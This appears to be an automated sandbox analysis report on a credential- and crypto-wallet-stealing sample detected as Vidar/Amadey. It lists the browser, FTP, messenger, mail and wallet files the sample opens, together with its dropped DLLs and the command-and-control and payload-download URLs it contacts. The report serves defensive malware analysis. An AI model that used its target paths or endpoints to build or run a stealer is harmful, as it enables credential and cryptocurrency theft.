                              Source: Yara matchFile source: 0.2.wKYTg7Gp6P.exe.2180e50.1.raw.unpack, type: UNPACKEDPE
                              Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                              Source: wKYTg7Gp6P.exeString found in binary or memory: ElectrumLTC
                              Source: wKYTg7Gp6P.exeString found in binary or memory: \ElectronCash\wallets\
                              Source: wKYTg7Gp6P.exeString found in binary or memory: \Electrum\wallets\
                              Source: wKYTg7Gp6P.exeString found in binary or memory: \jaxx\Local Storage\
                              Source: wKYTg7Gp6P.exeString found in binary or memory: window-state.json
                              Source: wKYTg7Gp6P.exeString found in binary or memory: exodus.conf.json
                              Source: wKYTg7Gp6P.exeString found in binary or memory: info.seco
                              Source: wKYTg7Gp6P.exeString found in binary or memory: \Exodus\exodus.wallet\
                              Source: wKYTg7Gp6P.exeString found in binary or memory: ElectrumLTC
                              Source: wKYTg7Gp6P.exeString found in binary or memory: \jaxx\Local Storage\
                              Source: wKYTg7Gp6P.exeString found in binary or memory: passphrase.json
                              Source: wKYTg7Gp6P.exeString found in binary or memory: \Ethereum\
                              Source: wKYTg7Gp6P.exeString found in binary or memory: \Exodus\exodus.wallet\
                              Source: wKYTg7Gp6P.exeString found in binary or memory: file__0.localstorage
                              Source: wKYTg7Gp6P.exeString found in binary or memory: default_wallet
                              Source: wKYTg7Gp6P.exeString found in binary or memory: \Ethereum\
                              Source: wKYTg7Gp6P.exeString found in binary or memory: \MultiDoge\
                              Source: wKYTg7Gp6P.exeString found in binary or memory: \Exodus\exodus.wallet\
                              Source: wKYTg7Gp6P.exeString found in binary or memory: seed.seco
                              Source: wKYTg7Gp6P.exeString found in binary or memory: keystore
                              Source: wKYTg7Gp6P.exeString found in binary or memory: \Electrum-LTC\wallets\
                              Tries to harvest and steal Bitcoin Wallet informationShow sources
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                              Tries to harvest and steal browser information (history, passwords, etc)Show sources
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                              Tries to harvest and steal ftp login credentialsShow sources
                              Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
                              Tries to steal Crypto Currency WalletsShow sources
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?????? Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?????? Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\??????????Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\??????????Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\????Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\????Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\????Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\????Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\??rJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\??rJump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\????Jump to behavior
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\????Jump to behavior
                              Tries to steal Instant Messenger accounts or passwordsShow sources
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                              Tries to steal Mail credentials (via file access)Show sources
                              Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                              Source: Yara matchFile source: Process Memory Space: wKYTg7Gp6P.exe PID: 6924, type: MEMORY

                              Remote Access Functionality:

                              barindex
                              Yara detected Vidar stealerShow sources
                              Source: Yara matchFile source: 00000000.00000003.659819807.0000000002250000.00000004.00000001.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.700376910.0000000002180000.00000040.00000001.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: wKYTg7Gp6P.exe PID: 6924, type: MEMORY
                              Source: Yara matchFile source: 0.2.wKYTg7Gp6P.exe.400000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.3.wKYTg7Gp6P.exe.2250000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.3.wKYTg7Gp6P.exe.2250000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.wKYTg7Gp6P.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.wKYTg7Gp6P.exe.2180e50.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.wKYTg7Gp6P.exe.2180e50.1.raw.unpack, type: UNPACKEDPE

                              Mitre Att&ck Matrix

                              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                              Valid AccountsWindows Management Instrumentation1Application Shimming1Exploitation for Privilege Escalation1Disable or Modify Tools1OS Credential Dumping2System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumData Obfuscation1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                              Default AccountsNative API1Registry Run Keys / Startup Folder1Application Shimming1Deobfuscate/Decode Files or Information1Input Capture1Account Discovery1Remote Desktop ProtocolData from Local System4Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                              Domain AccountsCommand and Scripting Interpreter2Logon Script (Windows)Process Injection212Obfuscated Files or Information3Credentials in Registry2File and Directory Discovery4SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationEncrypted Channel22Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                              Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Software Packing23Credentials In Files1System Information Discovery66Distributed Component Object ModelInput Capture1Scheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
                              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsSecurity Software Discovery131SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol14Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                              Replication Through Removable MediaLaunchdRc.commonRc.commonModify Registry1Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion21DCSyncProcess Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection212Proc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)NTFS File Attributes1/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 signatures2 2 Behavior Graph ID: 399582 Sample: wKYTg7Gp6P.exe Startdate: 28/04/2021 Architecture: WINDOWS Score: 100 84 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->84 86 Found malware configuration 2->86 88 Antivirus detection for dropped file 2->88 90 9 other signatures 2->90 9 wKYTg7Gp6P.exe 93 2->9         started        process3 dnsIp4 66 ukedocumentary.com 89.184.92.210, 49744, 80 MIROHOSTWebhostingdatacenteranddomainnamesregistrati Ukraine 9->66 68 78.47.81.226, 49735, 80 HETZNER-ASDE Germany 9->68 70 api.faceit.com 104.17.63.50, 443, 49733 CLOUDFLARENETUS United States 9->70 52 C:\Users\user\AppData\Local\...\xsrv2[1].exe, PE32 9->52 dropped 54 C:\ProgramData\M7WCJ84VE5TXJ0R4.exe, PE32 9->54 dropped 56 C:\...\M7WCJ84VE5TXJ0R4.exe:Zone.Identifier, ASCII 9->56 dropped 58 12 other files (none is malicious) 9->58 dropped 100 Detected unpacking (changes PE section rights) 9->100 102 Detected unpacking (overwrites its own PE header) 9->102 104 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 9->104 106 5 other signatures 9->106 14 M7WCJ84VE5TXJ0R4.exe 4 9->14         started        18 cmd.exe 1 9->18         started        file5 signatures6 process7 file8 60 C:\Users\user\AppData\Local\...\blfte.exe, PE32 14->60 dropped 108 Detected unpacking (changes PE section rights) 14->108 110 Detected unpacking (overwrites its own PE header) 14->110 112 Machine Learning detection for dropped file 14->112 114 Contains functionality to inject code into remote processes 14->114 20 blfte.exe 18 14->20         started        25 taskkill.exe 1 18->25         started        27 conhost.exe 18->27         started        29 timeout.exe 1 18->29         started        signatures9 process10 dnsIp11 62 176.111.174.114, 49750, 49751, 49752 WILWAWPL Russian Federation 20->62 64 192.168.2.1 unknown unknown 20->64 44 C:\Users\user\AppData\Local\...\scr[1].dll, PE32 20->44 dropped 46 C:\Users\user\AppData\Local\...\cred[1].dll, PE32 20->46 dropped 48 C:\ProgramData\1a9f26b569d5df\scr.dll, PE32 20->48 dropped 50 C:\ProgramData\1a9f26b569d5df\cred.dll, PE32 20->50 dropped 92 Detected unpacking (changes PE section rights) 20->92 94 Detected unpacking (overwrites its own PE header) 20->94 96 Machine Learning detection for dropped file 20->96 31 rundll32.exe 20->31         started        35 cmd.exe 1 20->35         started        37 rundll32.exe 1 20->37         started        file12 signatures13 process14 dnsIp15 72 192.168.2.4, 443, 49228, 49257 unknown unknown 31->72 74 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 31->74 76 Tries to steal Instant Messenger accounts or passwords 31->76 78 Tries to steal Mail credentials (via file access) 31->78 80 Tries to harvest and steal ftp login credentials 31->80 39 reg.exe 1 35->39         started        42 conhost.exe 35->42         started        82 System process connects to network (likely due to code injection or exploit) 37->82 signatures16 process17 signatures18 98 Creates an undocumented autostart registry key 39->98

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              wKYTg7Gp6P.exe49%VirustotalBrowse
                              wKYTg7Gp6P.exe59%ReversingLabsWin32.Trojan.Chapak
                              wKYTg7Gp6P.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\ProgramData\1a9f26b569d5df\cred.dll100%AviraHEUR/AGEN.1137247
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred[1].dll100%AviraHEUR/AGEN.1137247
                              C:\ProgramData\1a9f26b569d5df\scr.dll100%AviraHEUR/AGEN.1136939
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\scr[1].dll100%AviraHEUR/AGEN.1136939
                              C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\xsrv2[1].exe100%Joe Sandbox ML
                              C:\ProgramData\M7WCJ84VE5TXJ0R4.exe100%Joe Sandbox ML
                              C:\ProgramData\1a9f26b569d5df\cred.dll83%ReversingLabsWin32.Infostealer.Decred
                              C:\ProgramData\1a9f26b569d5df\scr.dll83%ReversingLabsWin32.Trojan.Amadey
                              C:\ProgramData\freebl3.dll0%MetadefenderBrowse
                              C:\ProgramData\freebl3.dll0%ReversingLabs
                              C:\ProgramData\mozglue.dll3%MetadefenderBrowse
                              C:\ProgramData\mozglue.dll0%ReversingLabs
                              C:\ProgramData\msvcp140.dll0%MetadefenderBrowse
                              C:\ProgramData\msvcp140.dll0%ReversingLabs
                              C:\ProgramData\nss3.dll0%MetadefenderBrowse
                              C:\ProgramData\nss3.dll0%ReversingLabs

                              Unpacked PE Files

                              SourceDetectionScannerLabelLinkDownload
                              21.2.rundll32.exe.2570000.1.unpack100%AviraHEUR/AGEN.1108768Download File
                              0.3.wKYTg7Gp6P.exe.2250000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                              0.2.wKYTg7Gp6P.exe.2180e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File

                              Domains

                              SourceDetectionScannerLabelLink
                              ukedocumentary.com0%VirustotalBrowse

                              URLs

                              SourceDetectionScannerLabelLink
                              http://176.111.174.114/Hnq8vS/index.php14/Hnq8vS/index.php0%Avira URL Cloudsafe
                              http://78.47.81.226/0%VirustotalBrowse
                              http://78.47.81.226/0%Avira URL Cloudsafe
                              http://www.mozilla.com00%URL Reputationsafe
                              http://www.mozilla.com00%URL Reputationsafe
                              http://www.mozilla.com00%URL Reputationsafe
                              http://www.mozilla.com00%URL Reputationsafe
                              http://ukedocumentary.com/wp-content/themes/cinestar/extendvc/xsrv2.exe;slDB0%Avira URL Cloudsafe
                              http://176.111.174.114/Hnq8vS/index.php?t0%Avira URL Cloudsafe
                              http://176.111.174.114/Hnq8vS/plugins/cred.dllQ.b0%Avira URL Cloudsafe
                              http://78.47.81.226/mozglue.dll:R0%Avira URL Cloudsafe
                              http://176.111.174.114/Hnq8vS/plugins/cred.dll1%VirustotalBrowse
                              http://176.111.174.114/Hnq8vS/plugins/cred.dll0%Avira URL Cloudsafe
                              http://78.47.81.226/87340%Avira URL Cloudsafe
                              https:///Hnq8vS/index.php0%Avira URL Cloudsafe
                              http://176.111.174.114/Hnq8vS/index.php)0%Avira URL Cloudsafe
                              http://176.111.174.114/Hnq8vS/index.php20%Avira URL Cloudsafe
                              http://78.47.81.226/E0%Avira URL Cloudsafe
                              http://176.111.174.114/Hnq8vS/index.phpC0%Avira URL Cloudsafe
                              http://78.47.81.226/softokn3.dll4v=0%Avira URL Cloudsafe
                              http://176.111.174.114/Hnq8vS/index.php0%Avira URL Cloudsafe
                              http://176.111.174.114//Hnq8vS/index.php?scr=up0%Avira URL Cloudsafe
                              http://ocsp.thawte.com00%URL Reputationsafe
                              http://ocsp.thawte.com00%URL Reputationsafe
                              http://ocsp.thawte.com00%URL Reputationsafe
                              http://78.47.81.226/msvcp140.dll0%Avira URL Cloudsafe
                              http://176.111.174.114/Hnq8vS/plugins/scr.dll0%Avira URL Cloudsafe
                              http://176.111.174.114/Hnq8vS/index.php14/Hnq8vS/index.phpK0%Avira URL Cloudsafe
                              http://78.47.81.226/vcruntime140.dll0%Avira URL Cloudsafe
                              http://176.111.174.11414/Hnq8vS/index.php0%Avira URL Cloudsafe
                              http://ukedocumentary.com/wp-content/themes/cinestar/extendvc/xsrv2.exeeDB0%Avira URL Cloudsafe
                              http://176.111.174.114/Hnq8vS/index.php9c610%Avira URL Cloudsafe
                              http://ukedocumentary.com/wp-content/themes/cinestar/extendvc/xsrv2.exe0%Avira URL Cloudsafe
                              http://176.111.174.114/Hnq8vS/index.php.FileTypeAssociationR0%Avira URL Cloudsafe
                              http://ukedocumentary.com/wp-content/themes/cinestar/extendvc/xsrv2.exe;0%Avira URL Cloudsafe
                              http://78.47.81.226/8730%Avira URL Cloudsafe
                              http://78.47.81.226/freebl3.dll0%Avira URL Cloudsafe
                              http://78.47.81.226/vcruntime140.dllTB0%Avira URL Cloudsafe
                              http://78.47.81.226/mozglue.dll0%Avira URL Cloudsafe
                              http://78.47.81.226/vcruntime140.dlliB0%Avira URL Cloudsafe
                              https://watson.telemet0%URL Reputationsafe
                              https://watson.telemet0%URL Reputationsafe
                              https://watson.telemet0%URL Reputationsafe
                              http://78.47.81.226/nss3.dll0%Avira URL Cloudsafe
                              http://176.111.174.114/Hnq8vS/index.phpv0%Avira URL Cloudsafe
                              http://176.111.174.114/Hnq8vS/index.php1D0%Avira URL Cloudsafe
                              http://176.111.174.114/Hnq8vS/index.phpo0%Avira URL Cloudsafe
                              http://176.111.174.114/Hnq8vS/index.phpr0%Avira URL Cloudsafe
                              http://176.111.174.114//Hnq8vS/index.php0%Avira URL Cloudsafe
                              http://78.47.81.226/softokn3.dll0%Avira URL Cloudsafe

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              ukedocumentary.com
                              		89.184.92.210
                              		truetrueunknown
                              api.faceit.com
                              		104.17.63.50
                              		truefalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://78.47.81.226/false
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://176.111.174.114/Hnq8vS/plugins/cred.dlltrue
                                • 1%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://176.111.174.114/Hnq8vS/index.phptrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://176.111.174.114//Hnq8vS/index.php?scr=uptrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://78.47.81.226/msvcp140.dllfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://176.111.174.114/Hnq8vS/plugins/scr.dlltrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://78.47.81.226/vcruntime140.dllfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://ukedocumentary.com/wp-content/themes/cinestar/extendvc/xsrv2.exetrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://78.47.81.226/873false
                                • Avira URL Cloud: safe
                                		unknown
                                http://78.47.81.226/freebl3.dllfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://78.47.81.226/mozglue.dllfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://78.47.81.226/nss3.dllfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://176.111.174.114//Hnq8vS/index.phptrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://78.47.81.226/softokn3.dllfalse
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://176.111.174.114/Hnq8vS/index.php14/Hnq8vS/index.phpblfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://duckduckgo.com/chrome_newtabtemp.0.drfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=temp.0.drfalse
                                    		high
                                    http://www.mozilla.com0softokn3[1].dll.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://ukedocumentary.com/wp-content/themes/cinestar/extendvc/xsrv2.exe;slDBwKYTg7Gp6P.exe, 00000000.00000002.700929303.0000000002C9D000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://api.faceit.com/GuwKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpfalse
                                      		high
                                      http://176.111.174.114/Hnq8vS/index.php?tblfte.exe, 0000000A.00000002.926601724.0000000003670000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://176.111.174.114/Hnq8vS/plugins/cred.dllQ.bblfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://78.47.81.226/mozglue.dll:RwKYTg7Gp6P.exe, 00000000.00000002.700301499.0000000000893000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://78.47.81.226/8734wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crl.thawte.com/ThawteTimestampingCA.crl0softokn3[1].dll.0.drfalse
                                        		high
                                        https:///Hnq8vS/index.phpblfte.exe, 0000000A.00000002.923945938.00000000006B5000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        http://176.111.174.114/Hnq8vS/index.php)blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://api.faceit.com/NuwKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpfalse
                                          		high
                                          http://176.111.174.114/Hnq8vS/index.php2blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://78.47.81.226/EwKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://176.111.174.114/Hnq8vS/index.phpCblfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://78.47.81.226/softokn3.dll4v=wKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.mozilla.com/en-US/blocklist/mozglue[1].dll.0.drfalse
                                            		high
                                            http://ocsp.thawte.com0softokn3[1].dll.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://176.111.174.114/Hnq8vS/index.php14/Hnq8vS/index.phpKblfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=temp.0.drfalse
                                              		high
                                              http://176.111.174.11414/Hnq8vS/index.phpblfte.exe, 0000000A.00000002.926601724.0000000003670000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              http://ukedocumentary.com/wp-content/themes/cinestar/extendvc/xsrv2.exeeDBwKYTg7Gp6P.exe, 00000000.00000002.700929303.0000000002C9D000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchtemp.0.drfalse
                                                		high
                                                http://176.111.174.114/Hnq8vS/index.php9c61blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://176.111.174.114/Hnq8vS/index.php.FileTypeAssociationRblfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://ukedocumentary.com/wp-content/themes/cinestar/extendvc/xsrv2.exe;wKYTg7Gp6P.exe, 00000000.00000002.700929303.0000000002C9D000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://ac.ecosia.org/autocomplete?q=temp.0.drfalse
                                                  		high
                                                  http://78.47.81.226/vcruntime140.dllTBwKYTg7Gp6P.exe, 00000000.00000002.700301499.0000000000893000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://78.47.81.226/vcruntime140.dlliBwKYTg7Gp6P.exe, 00000000.00000002.700301499.0000000000893000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://watson.telemetwKYTg7Gp6P.exe, 00000000.00000002.700263265.000000000085B000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://duckduckgo.com/chrome_newtabSQLitetemp.0.drfalse
                                                    		high
                                                    http://176.111.174.114/Hnq8vS/index.phpvblfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://176.111.174.114/Hnq8vS/index.php1Dblfte.exe, 0000000A.00000002.926933202.00000000036A9000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://176.111.174.114/Hnq8vS/index.phpoblfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://176.111.174.114/Hnq8vS/index.phprblfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://api.faceit.com/core/v1/nicknames/sslamlssawKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=temp.0.drfalse
                                                        		high
                                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=temp.0.drfalse
                                                          		high

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          104.17.63.50
                                                          		api.faceit.comUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          89.184.92.210
                                                          		ukedocumentary.comUkraine
                                                          		28907MIROHOSTWebhostingdatacenteranddomainnamesregistratitrue
                                                          78.47.81.226
                                                          		unknownGermany
                                                          		24940HETZNER-ASDEfalse
                                                          176.111.174.114
                                                          		unknownRussian Federation
                                                          		201305WILWAWPLtrue

                                                          Private

                                                          IP
                                                          192.168.2.1
                                                          192.168.2.4

                                                          General Information

                                                          Joe Sandbox Version:32.0.0 Black Diamond
                                                          Analysis ID:399582
                                                          Start date:28.04.2021
                                                          Start time:22:57:46
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 13m 26s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:wKYTg7Gp6P.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:27
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.phis.troj.spyw.evad.winEXE@21/30@2/6
                                                          EGA Information:Failed
                                                          HDC Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 86%
                                                          • Number of executed functions: 182
                                                          • Number of non-executed functions: 165
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .exe
                                                          Warnings:
